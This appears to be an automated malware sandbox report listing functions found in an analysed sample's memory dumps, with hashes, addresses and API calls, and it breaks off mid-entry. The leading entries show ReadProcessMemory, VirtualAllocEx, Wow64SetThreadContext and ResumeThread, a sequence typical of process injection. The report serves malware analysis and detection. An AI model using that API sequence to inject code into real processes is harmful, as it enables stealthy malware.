                                                      • Instruction ID: 4d7fbb6afe48cd76d9411b46b48fcb55cbf9b51fd68e4e7bb58c6ffbeeafd753
                                                      • Opcode Fuzzy Hash: 9b9b4aa590799becbf463c714986dba6c0e70ddcea66df18fc99ad7bbf30f948
                                                      • Instruction Fuzzy Hash: 214199B4D052589FCF00CFA9D984AEEFBF1BB49314F20942AE814B7250D775AA45CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00CB7CA8, Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00CB7D5A
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419945369.0000000000CB0000.00000040.00000001.sdmp, Offset: 00CB0000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: a3e49a65f886e89958fc7a365be65d7363b5d39893248b5ea71e4785c0bf830b
                                                      • Instruction ID: 7b97a98171631fc2a3856e9d29d44dea2a1ebcbbeb4e21e532b65c5a494c9ccb
                                                      • Opcode Fuzzy Hash: a3e49a65f886e89958fc7a365be65d7363b5d39893248b5ea71e4785c0bf830b
                                                      • Instruction Fuzzy Hash: BB41AAB8D042589FCF10CFA9D984AEEFBB1BF49314F20942AE814B7240D775A945CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00CB7980, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00CB7A2A
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419945369.0000000000CB0000.00000040.00000001.sdmp, Offset: 00CB0000, based on PE: false
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 0429cb6cd8dcccc18699575a1ed4ddc9e67857e2682e2a47060e0544dcb98ce0
                                                      • Instruction ID: 78abc2cfa2e0fa57990e4bcff1015c3beed63d3086dc67636eca1e1e557fd753
                                                      • Opcode Fuzzy Hash: 0429cb6cd8dcccc18699575a1ed4ddc9e67857e2682e2a47060e0544dcb98ce0
                                                      • Instruction Fuzzy Hash: C34199B8D042589FCF10CFA9D984ADEFBB1BF49314F20A42AE815B7200D735A915CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00CB7710, Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 00CB77BF
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419945369.0000000000CB0000.00000040.00000001.sdmp, Offset: 00CB0000, based on PE: false
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: 196e20a332c5b48cff4be0b3d442752e9690f48522f9e54d5116c6ba38ca54d3
                                                      • Instruction ID: 5885792633753ae5a35212dcf64c859dfe636deebe2b028726b7e484d010fb7f
                                                      • Opcode Fuzzy Hash: 196e20a332c5b48cff4be0b3d442752e9690f48522f9e54d5116c6ba38ca54d3
                                                      • Instruction Fuzzy Hash: 9641CEB4D002589FCB10CFA9D984AEEFBF1BF49314F24842AE814B7240D779A945CF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00CB75D0, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ResumeThread.KERNELBASE(?), ref: 00CB764E
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419945369.0000000000CB0000.00000040.00000001.sdmp, Offset: 00CB0000, based on PE: false
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 6b9aade74fd4e1fbdef68f3d876fa8ff6acd930c4fd0c2a422e6c08c2c07f5a5
                                                      • Instruction ID: a1957d9a43557235b7374267143e4bc2f53fe542f53a0dcb0eb9a596b8e55aeb
                                                      • Opcode Fuzzy Hash: 6b9aade74fd4e1fbdef68f3d876fa8ff6acd930c4fd0c2a422e6c08c2c07f5a5
                                                      • Instruction Fuzzy Hash: CB31BCB4D052189FCF14CFA9D984ADEFBB1AF49314F20942AE814B7300D735A901CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E1336, Relevance: 1.4, Strings: 1, Instructions: 131COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: 03d43404cb46119563293f00c10366c95edfe3ef32554a8dc0fd3fe5f688971e
                                                      • Instruction ID: a3b68ed85b0b5f06a0037bb34b593b6f742e1016e43d3d4d297cb7a0a20b1f27
                                                      • Opcode Fuzzy Hash: 03d43404cb46119563293f00c10366c95edfe3ef32554a8dc0fd3fe5f688971e
                                                      • Instruction Fuzzy Hash: BC51E378E15248CFDB10DFA9E888A9DBBB1FF09301F60902AD41AE7351DB349951CF41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E00D0, Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: fCPl
                                                      • API String ID: 0-3010081917
                                                      • Opcode ID: da66fec2d73e4579472d473297fedd3d3a2a439997c8099cd990c59182491a05
                                                      • Instruction ID: 2af1e0a59398cccb847c5c3ff67c19f29e7d744c9d2881b339a5b26b1d576dd7
                                                      • Opcode Fuzzy Hash: da66fec2d73e4579472d473297fedd3d3a2a439997c8099cd990c59182491a05
                                                      • Instruction Fuzzy Hash: 3E212578E1420A9FCB04DFA5D9899EEBBB2FF88310F10942AD901B3350DB705941CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E0571, Relevance: .2, Instructions: 208COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5a8ff2d15f19e709a4e8d124e9f245ec8a37e8d288d4405f0274a8850361add7
                                                      • Instruction ID: c409dcf3a108e88446c123b4c4d31be4aeefec344b95680c3dfacd4b8d2099dc
                                                      • Opcode Fuzzy Hash: 5a8ff2d15f19e709a4e8d124e9f245ec8a37e8d288d4405f0274a8850361add7
                                                      • Instruction Fuzzy Hash: 9D91E434E11209DFCB08DFA8D4949DDB7B2FF8A304F11496AE405BB365EB71A985CB41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E0084, Relevance: .2, Instructions: 206COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e928fffa7e9134131958df4ad5ffab80df70161e86a9edb16d96cf63fa01a1b5
                                                      • Instruction ID: c13c9874d015dc5fa4f9798d069585b950da15ca08f112a4e06a8a0979785608
                                                      • Opcode Fuzzy Hash: e928fffa7e9134131958df4ad5ffab80df70161e86a9edb16d96cf63fa01a1b5
                                                      • Instruction Fuzzy Hash: A791D334E11209DFCB08EFA8D4949ADB7B2FF8A304F518969E4057B364EF71A985CB41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E1651, Relevance: .2, Instructions: 162COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1bdbe3a4f054c732dfe0c8bf638a096368e7c387b348ecfae2993eecba4faaca
                                                      • Instruction ID: 318c3e98fd4d3b5a48ce3354aebdc1790baee8296ea4e83dfd887d389394cc21
                                                      • Opcode Fuzzy Hash: 1bdbe3a4f054c732dfe0c8bf638a096368e7c387b348ecfae2993eecba4faaca
                                                      • Instruction Fuzzy Hash: D8512374E55258CFDB00CFAAD8886EDBBF1BF4A310F64902AD405B7294DB7499A1CF11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E082B, Relevance: .1, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86fe126fba105535ae1c4c98d8d247ee96976a9e5228712306de37dcd15b3484
                                                      • Instruction ID: 39c964f1276d5a73f12dcf54831476457be425d649857839cedf70aae1fb4455
                                                      • Opcode Fuzzy Hash: 86fe126fba105535ae1c4c98d8d247ee96976a9e5228712306de37dcd15b3484
                                                      • Instruction Fuzzy Hash: 8841CEB0D05249CFCB04CFEAC9906EDBBB2EF89304F24846AD419A7355EB745986CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002EAEF0, Relevance: .1, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b1024a1c5136546adc9e62a39c1f7641a1efec893a4e3211b4aef8664d5df4b7
                                                      • Instruction ID: 59436b92536c694a227554e14260d933eb8a4ed8eb943ea8027e03b95781aa62
                                                      • Opcode Fuzzy Hash: b1024a1c5136546adc9e62a39c1f7641a1efec893a4e3211b4aef8664d5df4b7
                                                      • Instruction Fuzzy Hash: 3B314BB0E24249CFCB14DFAAC8456AEFBF1BF48304F50816AD405A7B94D735A991CF92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0028D01C, Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419293016.000000000028D000.00000040.00000001.sdmp, Offset: 0028D000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d0a0b529ac7883e0b6fc8f9f6f6101f45499e27d0e5f9b39afc19ed61e213792
                                                      • Instruction ID: 00a2b967cbb854647b06c73d3380fb035b6c3b4ba6c0404bd39700a2fca7e90b
                                                      • Opcode Fuzzy Hash: d0a0b529ac7883e0b6fc8f9f6f6101f45499e27d0e5f9b39afc19ed61e213792
                                                      • Instruction Fuzzy Hash: 3D21F578618204DFDB24EF14D984B26BB61EB88314F24C569D9094B2C6C37AD85ACB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E1160, Relevance: .1, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 77b1a2fda6f7c5c6de3c79c902bc088bd86164b750cc67247a92b81557b675d5
                                                      • Instruction ID: f0454a7360c6a18c75a75dd0d531030a16dcaec5846a66f86a12a9336b113dbd
                                                      • Opcode Fuzzy Hash: 77b1a2fda6f7c5c6de3c79c902bc088bd86164b750cc67247a92b81557b675d5
                                                      • Instruction Fuzzy Hash: 02218E34C64159CBCF00CFE6D8087EEBBB4BB4A301F509025D619B7240C7B00AA0CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E3EA3, Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 284c4708fc2093b6da23d7cc1f6d646dd854a1b75397f2db27208cd412938a03
                                                      • Instruction ID: db9b315f96eed3f6f141ac8ef6b0e162b1cd15beebb5c84dba2d8557d45dbcfc
                                                      • Opcode Fuzzy Hash: 284c4708fc2093b6da23d7cc1f6d646dd854a1b75397f2db27208cd412938a03
                                                      • Instruction Fuzzy Hash: BA310574A5221ACFDB61DF64EA48BADBBB5FF49301F0441A6E419A7390DB700E81CF12
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002EAD70, Relevance: .1, Instructions: 60COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c502078266fae5bf509d4e4d4bdb0002f7ea86564dd2c7f75a98d95e8b7fc7fa
                                                      • Instruction ID: 07065efc9bdc240eb692df4835e40499851bf8bf3b80beef25f262c99cc64d85
                                                      • Opcode Fuzzy Hash: c502078266fae5bf509d4e4d4bdb0002f7ea86564dd2c7f75a98d95e8b7fc7fa
                                                      • Instruction Fuzzy Hash: D2214734E01219CBCB04DFAAD8046EEBBF6EF89311F14942AC405B3710DB70A910CFA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0028D017, Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419293016.000000000028D000.00000040.00000001.sdmp, Offset: 0028D000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5ee4ac64c9abf8d2bb026fbfa0af133c2d2926d3858c879bdbe5220464767502
                                                      • Instruction ID: 07edbca417629bbb7338dacb1dca8d1aac5645bc523d2fb055e3bb2c0e2746ba
                                                      • Opcode Fuzzy Hash: 5ee4ac64c9abf8d2bb026fbfa0af133c2d2926d3858c879bdbe5220464767502
                                                      • Instruction Fuzzy Hash: F511DD79504280CFDB11CF14D5C4B16FFA1FB84314F24C6AAD8494B696C33AD81ACFA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E0497, Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bad23be9cf03e5f44c42d865b77f6ecd8c4b0d46233f33cc011a88dbc14e49cc
                                                      • Instruction ID: 64f309d6e0a2de0f497504d74650683a3e820b11e17af1aa792c1fd1a642c45c
                                                      • Opcode Fuzzy Hash: bad23be9cf03e5f44c42d865b77f6ecd8c4b0d46233f33cc011a88dbc14e49cc
                                                      • Instruction Fuzzy Hash: E311D234A45208DFC745DFA9C584AADBBF1FF4A304F1144A9D808AB362DB309E41DB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E0074, Relevance: .1, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ce36e43f59643fc89026217ffd4912e5cffaf7212cc728d9be9c1c0a756cb09f
                                                      • Instruction ID: 0aae867ef1595ce19621c9a6ae48f0300b21c415c1b6afb64468b047b9a44e81
                                                      • Opcode Fuzzy Hash: ce36e43f59643fc89026217ffd4912e5cffaf7212cc728d9be9c1c0a756cb09f
                                                      • Instruction Fuzzy Hash: B9111534A55208DFCB44EFA9C588AAEB7F1FF4A305F5184A9D508A7361DB30AE51DF80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E0972, Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fb392d516225709c558eff0b86c6a911edb08b74a201a15a4acb8ee05e91cf9f
                                                      • Instruction ID: 2665a2dbbab6e81f6ecb93e6da1be46a6dc3eded3845f3abc8201ec53391f87a
                                                      • Opcode Fuzzy Hash: fb392d516225709c558eff0b86c6a911edb08b74a201a15a4acb8ee05e91cf9f
                                                      • Instruction Fuzzy Hash: 541123B4D0425ACFCB40DFB9C984AAEBBF0EF4A304B5184AAD508E7322D7305A41CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E00C0, Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 207e4ac959a25bf8ca9066427f042f8e82af44ea503c275e98e3f982eaf2c491
                                                      • Instruction ID: f4b1ec7c834c8d2c1dce3097cd20df7ff6240d6fcae55b340939c90eea025925
                                                      • Opcode Fuzzy Hash: 207e4ac959a25bf8ca9066427f042f8e82af44ea503c275e98e3f982eaf2c491
                                                      • Instruction Fuzzy Hash: 08011774D552499FCB40EFA9C984AAEFBF0FF49304F5184AAD908B3311DB305A51CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E42C4, Relevance: .0, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 301ace9b3261e01a6165d82eca19262c50e48438158c05eadaadd37e983fb08f
                                                      • Instruction ID: 28f4f8c14c681380ff32662c4ee96c8751da4f0a1351afa3bede171cf5aaf584
                                                      • Opcode Fuzzy Hash: 301ace9b3261e01a6165d82eca19262c50e48438158c05eadaadd37e983fb08f
                                                      • Instruction Fuzzy Hash: 65112D74A21245CFDB25DFA9E98869DB7F2FF49301F1480A6D405E7254DB309E50CF42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E0439, Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 39b6ea05e06c23a93cb318978536d60d46789bbf4e6e293a11a36a51cee4fb57
                                                      • Instruction ID: 26693040f8b4730ce305511dacd147b33bb682e329c7432265e3ed2b914c2635
                                                      • Opcode Fuzzy Hash: 39b6ea05e06c23a93cb318978536d60d46789bbf4e6e293a11a36a51cee4fb57
                                                      • Instruction Fuzzy Hash: DFF0273055A3849FDB01EBB088A877E7B34CF43204F2614DAC64597197DF314E60E740
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E49B8, Relevance: .0, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0aa89254a388fa2400bf8f496e7ee462a964563192ae90a7b76a111d7fa4004f
                                                      • Instruction ID: 6b66ef5c9d651ea649f85362a7877d82b532dcfbd130b646907290c9525a8096
                                                      • Opcode Fuzzy Hash: 0aa89254a388fa2400bf8f496e7ee462a964563192ae90a7b76a111d7fa4004f
                                                      • Instruction Fuzzy Hash: 87F05830D55249DFCB40EFAAD94539EFBF4AF05304F4080AA8808E3211E7309A60CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E0448, Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 50a7f8ee04f9812b3353daf24d16af3060f5a0d68586d47dafc0a9e729791957
                                                      • Instruction ID: 8f0d9fc1a3219747be03c77a7657294b992c29f8d65d19e962c7a04d219eb97e
                                                      • Opcode Fuzzy Hash: 50a7f8ee04f9812b3353daf24d16af3060f5a0d68586d47dafc0a9e729791957
                                                      • Instruction Fuzzy Hash: 38E0D8309A62489BDB04FFB0885977E7265CF42204F611868C50567295CF318E50E780
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E49A9, Relevance: .0, Instructions: 27COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a973d91404cf97f4adec27c3259b1cb34ea5e35b7dce43fe468f9adea9952f92
                                                      • Instruction ID: ee8836e2a6ae268ee174923988565dc1b2ebff71df203bfc42517b06fe64c0ad
                                                      • Opcode Fuzzy Hash: a973d91404cf97f4adec27c3259b1cb34ea5e35b7dce43fe468f9adea9952f92
                                                      • Instruction Fuzzy Hash: 1BF03770D69286DFCB52DFB9995425DBFF0AB06304F1091EFC944E3252E2304520CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E2668, Relevance: .0, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e3d7f94827da6db839012ec59ac6b4df55af15d9be5626c5a42052c94261071c
                                                      • Instruction ID: 81fa9c4a7be4d729e512673e9148289c85e660b247d08606d154729c035a9fe9
                                                      • Opcode Fuzzy Hash: e3d7f94827da6db839012ec59ac6b4df55af15d9be5626c5a42052c94261071c
                                                      • Instruction Fuzzy Hash: E1F08C34869284DFC745CFA4D848598BFB4EF0A300F5000EAC808DB362D6304954CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E1279, Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b9ab6bde57fc8a89a073744248830d27eef1249f371c29bee0d7bee5a516435f
                                                      • Instruction ID: a6baa4a005e922e0b9641ff751ae5cfddec70bbbb8e1504b80f9ef87573e76b6
                                                      • Opcode Fuzzy Hash: b9ab6bde57fc8a89a073744248830d27eef1249f371c29bee0d7bee5a516435f
                                                      • Instruction Fuzzy Hash: 3CE06D3484E388AFDB12DFB0AC185A87F74AB43301F1541EADD44972A2C7300974D7A2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E1BE1, Relevance: .0, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6437aaabbafe884e851918531ef79d8a795c558f22163a7fe60e1db8e0008f4b
                                                      • Instruction ID: ea7827cef337ef42a90a1e10f609bfc2b5650d34c4305ae3f52b4b1c2b9987a6
                                                      • Opcode Fuzzy Hash: 6437aaabbafe884e851918531ef79d8a795c558f22163a7fe60e1db8e0008f4b
                                                      • Instruction Fuzzy Hash: D2E06D3485A288DFCB01CBB8E8492987FB4AB0A301F5401EAC809D3261D7300998D712
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E3C70, Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cb088a20c728219f622a232c1ee821bba6ecd7e3b5735c1463782ca7455dadb0
                                                      • Instruction ID: cec716e08a1c9b839685d7ac033ab28088b4116afc6d56cda5fb2dbdbaa5cafe
                                                      • Opcode Fuzzy Hash: cb088a20c728219f622a232c1ee821bba6ecd7e3b5735c1463782ca7455dadb0
                                                      • Instruction Fuzzy Hash: 9DE0E574D05208EFCB54DFA9D9086ADBBB5EB49305F6081AAD808A3710E7359E60DF81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E21B0, Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 056efcbf40b09d8a5c4cafb128491d49aa873d977bfde07a1d046973fc04faeb
                                                      • Instruction ID: cc044e54a3d1fc56c664b1b387ff20817bdcc2ec9612535595e17c32878bb20a
                                                      • Opcode Fuzzy Hash: 056efcbf40b09d8a5c4cafb128491d49aa873d977bfde07a1d046973fc04faeb
                                                      • Instruction Fuzzy Hash: DAE01A34D55248EFCB44DFA9E8086ACBBF8FB49301F1081AAC819A3301D7341A54DF41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E1A00, Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c43b108c91a213a45fe52012c4d3c54cd544416d1a07c81169dae1aac4706883
                                                      • Instruction ID: 42b9296f24c65afb795a2e4e108f7135be35027b24c92b4671c39f44ea9d57c4
                                                      • Opcode Fuzzy Hash: c43b108c91a213a45fe52012c4d3c54cd544416d1a07c81169dae1aac4706883
                                                      • Instruction Fuzzy Hash: 40E04F74D56248EFCB44DFA9E9086ACBBF4FB49304F1081BAC808A3310E7341A60CF81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E2678, Relevance: .0, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f2edef6ad7871586b1743942c15101400c7ecbbd2d0eb490624cc852a8d82ac5
                                                      • Instruction ID: 7d91d7f5ad197ceb10444f1f2b41625d51e69fb92a7decf8a0d2a46578a6caca
                                                      • Opcode Fuzzy Hash: f2edef6ad7871586b1743942c15101400c7ecbbd2d0eb490624cc852a8d82ac5
                                                      • Instruction Fuzzy Hash: AEE04638964248DFCB44DFA8D848AACBBF8FB09305F6041E9D809E7321EB309A54CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E40FB, Relevance: .0, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 62728caef32b2e9e1c2f066b54126371c364bd1244c2c4e0f3532244de6efcf9
                                                      • Instruction ID: bf1f743264c366d9d1876e676029cb2bd54de350f3ac767c889ce81aafdccf63
                                                      • Opcode Fuzzy Hash: 62728caef32b2e9e1c2f066b54126371c364bd1244c2c4e0f3532244de6efcf9
                                                      • Instruction Fuzzy Hash: 42F09274921219CFCB65DF24E9987D8BBB5FB68305F0085EAD58AA7290DBB01EC0CF41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002E1BF0, Relevance: .0, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.419316299.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 90b9c54deabbc879fbd8c3a561c5c5415320448e02a97b103b0192ada3eac92d
